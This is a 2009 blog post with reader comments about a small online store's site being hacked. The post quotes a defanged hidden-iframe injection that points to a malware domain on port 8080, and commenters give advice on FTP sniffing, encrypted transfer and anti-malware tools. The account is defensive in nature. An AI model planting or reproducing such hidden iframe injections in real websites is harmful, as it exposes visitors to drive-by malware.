My site was hacked! Invisible iframe to Chinese malware site

Posted by Michael Michelini on Jun 14 2009

Ouch, what a way to end a week. Late last night talking to Andrew at New York Bar Store and then he tells me about a phone call he got from a customer saying there was some spam on our site, newyorkbarstore.com. Then I take a look, view source, and a HIDDEN iframe inserted on the footer of the majority of the pages in the site! WTF!!!
=============================
HACK CODE BELOW
iframe src http://greatshopfilm . cn:8080/index.php width=184 height=158 style=”visibility: hidden” iframe
============================

I quickly start to re-upload a backup of the site I have in my computer, as it was before this hacker code was inserted on the page. Then I see its FLAGGED ON google results. Luckily the rankings have not been affected, but as you can see below – THERE IS A WARNING on the top of the page that my site may be have harmful viruses! I can only imagine that this is going to do to my site traffic…..

I have fixed the problem, and resubmitted to Google Webmaster tools, lets see how long this takes to be removed from the google results…I’m told from 1 friend this happened to him before, and it took 2 – 3 days!

Also, I’m doing a virus scan on my computer right now, and it found a trojan virus in my TENCENT QQ instant messenger files. Must have been downloaded in a chatlog. This business of hacking has been picking up, I’ve been hearing and reading that blackhat SEO people are hacking sites, pumping them with malicious codes to benefit themselves (not exactly sure though)

Is this in response to the tough economy, and people finding ways to earn cash the evil way….sad….

I also hope none of my website visitors on newyorkbarstore.com were affected. The internet can be a scary place. I understand google and the search engines have to protect their users, its just horrible this scumbags can hack my site and place this malicious code there.

Keep on.

http://www.wewatchyourwebsite.com Thomas J. Raef

We’ve been seeing a huge increase in the number of people having their websites “hacked”. One of the most common ways right now is by infecting a PC then “sniffing” for FTP traffic.

Think about it. How many people have websites these days? It seems like everyone.

So why not infect PCs then wait for when they upload to a website through a protocol that sends everything in plain text?

You see, FTP does not encrypt it’s traffic. We created a YouTube video on how insecure FTP is: http://www.youtube.com/watch?v=oYI1kssrrbc

We’ve been recommending a couple of things. First, use AVG or Avast along with Malwarebytes. These have been catching more viruses/trojans than many of the more popular anti-virus programs have.

Second, if you update a website or websites, ask your hosting provider about moving to either SFTP or FTPS. Both of these protocols encrypt their traffic making it nearly impossible to sniff for username and password.

Last, stop using an administrator account on your PC for everyday work. A virus/trojan/worm can usually only obtain the same rights as the currently logged in user. If the current user can install software, then so can the malware. If the current user cannot install software, then neither can the malware.

There you are 3 things to do to protect your website from getting hacked – and if you use the free versions of the anti-malware software we’ve recommended, these 3 things cost you nothing!

I hope you found this information worth more than you paid for it.
http://www.michaelmichelini.com mike

Thanks Thomas!
wow, such a quick response to my post. I really appreciate this great feedback and solution. It is sad to see how others are profiting off all these small business owners and entrepreneurs hard work.
Alan

Thanks for the advice, my site has been hacked three times in one month, I have followed all what the service provider said to follow and it still happened. What they never told me is what you mention above. I use a Mac so will have to search for some catchers for OS X.. Have been using Nortons, but from what I read its not worth it. Thanks again.
vijay

Thank for the Great Feedback. I was suffering with the malware for our client’s website. These malwares cause lot of problem for the website.
We need to thoroughly clean the malware before loading to the server. Otherwise the malware scripts getting loaded every time after we upload our back up files into the server.
Matthias-Müller

Damn, that sound’s so easy if you think about it.
Will

SSH and SCP are the way to go for remote communications unless you can VPN in. SCP is a powerful command line tool, and there are some graphical versions out there as well I’m sure. Also, enforcing strong passwords is a good idea. If your server isn’t secure, a strong password doesn’t matter though…
andrew

What tough economy? There is no economic crisis in China.
http://blog.michaelmichelini.com mike

true, well maybe its not in China, but somewhere in the world then!!! but hey, they may be exporters! those aren’t doing so good

About Mike

American internet dude living in China (since '07) helping western companies leverage Chinese social media for business.

Passionate for working with more like-minded internet entrepreneurs. Love international business & connecting, and working on ways to give hard working people global opportunities. (Read More...)